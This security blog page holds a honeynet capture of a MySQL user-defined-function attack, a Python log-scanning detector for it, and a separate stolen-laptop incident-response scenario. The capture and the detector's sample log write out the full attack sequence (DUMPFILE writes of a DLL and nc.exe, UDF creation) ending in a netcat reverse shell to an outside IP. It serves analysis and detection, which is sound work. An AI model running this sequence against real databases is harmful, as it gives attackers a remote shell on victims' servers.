Wednesday, March 26, 2008

Name that hack

Today my honeynet was the victim of an oldie but goodie. It's time to play "NAME THAT HACK". What do you think is happening here?

A...
5.0.45-community-nt.^!..u"G|_G${.,.................c]+Yba?Ti4d{.
@..........@........................root....'NF.g".|Z/...=ao.nmysql.
...........
.....CREATE DATABASE nmxtmp
...........
.....USE nmxtmp
...........
/....CREATE TABLE cmd (codetab MEDIUMBLOB NOT NULL)
...........
( ...INSERT INTO cmd (codetab) VALUES (
0000100000000000000000000000000000200000602e72646174610000e009 [Truncated by me])
...........
5....SELECT * INTO DUMPFILE '..\\bin\\mycmd.dll' FROM cmd
......."...
?....CREATE FUNCTION cmd_execute RETURNS integer SONAME 'mycmd.dll'
...........
.....DROP TABLE cmd
...........
.....DROP DATABASE nmxtmp
...........
.....FLUSH LOGS
...........
.....CREATE DATABASE nmxtmp
...........
.....USE nmxtmp
...........
/....CREATE TABLE cmd (codetab MEDIUMBLOB NOT NULL)
...........
(....INSERT INTO cmd (codetab) VALUES (
00400000c02e696461746100005c070000002001000008000000e000 [truncated by me])
...........
3....SELECT * INTO DUMPFILE '..\\data\\nc.exe' FROM cmd
......."...
.....DROP TABLE cmd
...........
.....DROP DATABASE nmxtmp
...........
.....FLUSH LOGS
...........
D....SELECT cmd_execute('..\\data\\nc.exe 66.35.111.60 2095 -e cmd.exe')
.....R....def...cmd_execute('..\\data\\nc.exe 66.35.111.60 2095 -e cmd.exe')..?.........................537912269770588160.........
.....


Where would you begin your investigation?
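The query sequence in the capture (a BLOB staging table, SELECT ... INTO DUMPFILE into the server's own bin and data directories, CREATE FUNCTION ... SONAME, then a call to the new function) is exactly the kind of thing a defender can pick out of the MySQL general query log. The following is an added detection example, not code from this post; the log lines are constructed to mirror the capture, with made-up timestamps, connection ids and a made-up client address, and the severity labels are my own choice.

```python
import re

# Constructed sample shaped like a MySQL general query log. The queries are the ones
# from the capture above; the timestamps, connection ids and client address are made up.
SAMPLE_LOG = r"""
080326 10:02:11   12 Connect  root@203.0.113.7 on
080326 10:02:11   12 Query    CREATE DATABASE nmxtmp
080326 10:02:11   12 Query    CREATE TABLE cmd (codetab MEDIUMBLOB NOT NULL)
080326 10:02:12   12 Query    INSERT INTO cmd (codetab) VALUES (0x4d5a90)
080326 10:02:12   12 Query    SELECT * INTO DUMPFILE '..\\bin\\mycmd.dll' FROM cmd
080326 10:02:12   12 Query    CREATE FUNCTION cmd_execute RETURNS integer SONAME 'mycmd.dll'
080326 10:02:13   12 Query    FLUSH LOGS
080326 10:02:14   12 Query    SELECT * INTO DUMPFILE '..\\data\\nc.exe' FROM cmd
080326 10:02:15   12 Query    SELECT cmd_execute('..\\data\\nc.exe 66.35.111.60 2095 -e cmd.exe')
080326 10:05:00   13 Query    SELECT name FROM customers WHERE id = 42
"""

LINE_RE = re.compile(r"^\S+ \S+\s+(\d+) (\w+)\s*(.*)$")
DUMPFILE_RE = re.compile(r"\bINTO\s+(?:DUMP|OUT)FILE\s+'([^']*)'", re.I)
SONAME_RE = re.compile(r"\bCREATE\s+(?:AGGREGATE\s+)?FUNCTION\s+(\w+)\s+RETURNS\s+\w+\s+SONAME\s+'([^']*)'", re.I)
BLOB_TABLE_RE = re.compile(r"\bCREATE\s+TABLE\b.*\b(?:TINY|MEDIUM|LONG)?BLOB\b", re.I)
FLUSH_LOGS_RE = re.compile(r"^\s*FLUSH\s+LOGS\b", re.I)

def scan_general_log(text):
    """Return (conn_id, severity, rule, query) findings, correlating events per connection."""
    udfs = {}            # conn_id -> names of UDFs that connection created via SONAME
    wrote_file = set()   # conn_ids that have written a file with DUMPFILE/OUTFILE
    findings = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m or m.group(2) != "Query":
            continue
        conn, query = m.group(1), m.group(3)
        if BLOB_TABLE_RE.search(query):           # staging table for binary payloads
            findings.append((conn, "low", "BLOB staging table created", query))
        d = DUMPFILE_RE.search(query)
        if d:                                     # table contents written to the filesystem
            sev = "high" if re.search(r"\.(dll|so|exe)$", d.group(1), re.I) else "medium"
            findings.append((conn, sev, f"file write via DUMPFILE: {d.group(1)}", query))
            wrote_file.add(conn)
        s = SONAME_RE.search(query)
        if s:                                     # shared library registered as a UDF
            udfs.setdefault(conn, set()).add(s.group(1))
            findings.append((conn, "high", f"UDF loaded from {s.group(2)}", query))
        for name in udfs.get(conn, ()):           # later call to a UDF this session created
            if re.search(rf"\b{re.escape(name)}\s*\(", query, re.I):
                findings.append((conn, "critical", f"call to attacker-defined UDF {name}", query))
        if FLUSH_LOGS_RE.match(query) and conn in wrote_file:
            findings.append((conn, "medium", "FLUSH LOGS after file write", query))
    return findings
```

Run against the sample it reports six findings, all on connection 12 and none on the benign connection 13; the same rules applied to a real general log would also surface the FLUSH LOGS issued right after each file write, which is why the general log should be shipped off-host rather than relied on locally.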

Thursday, March 20, 2008

When laptops grow legs

One fine day in Europe an American businessman was traveling by train. Suddenly there was a large commotion somewhere up ahead in the passenger car. The businessman set his laptop down on top of his laptop bag on the empty seat next to him and stood up to observe the commotion. There appeared to be an argument of some form between two gentlemen. As the businessman sat back down he reached over to grab his laptop, except it wasn't there. Looking all around, he didn't see anything that looked suspicious. The laptop had been stolen right out from under his nose... literally.

Upon arriving back home, the businessman alerted his IT support staff that his laptop had been stolen and that he needed a new one right away. Following policy, the IT staff member notified his security staff.

Does knowing what was on the laptop make a difference? What if you don't know exactly what was on the laptop? Can you trust the businessman when he claims "there wasn't client data on there" or "there wasn't credit card information on my laptop"?

Do you consider the laptop compromised automatically and look for a backup of the laptop to use as a reference point for notifying individuals? Do you ignore the fact that the system was stolen?

If a case like this gets turned over to you, how do you handle it?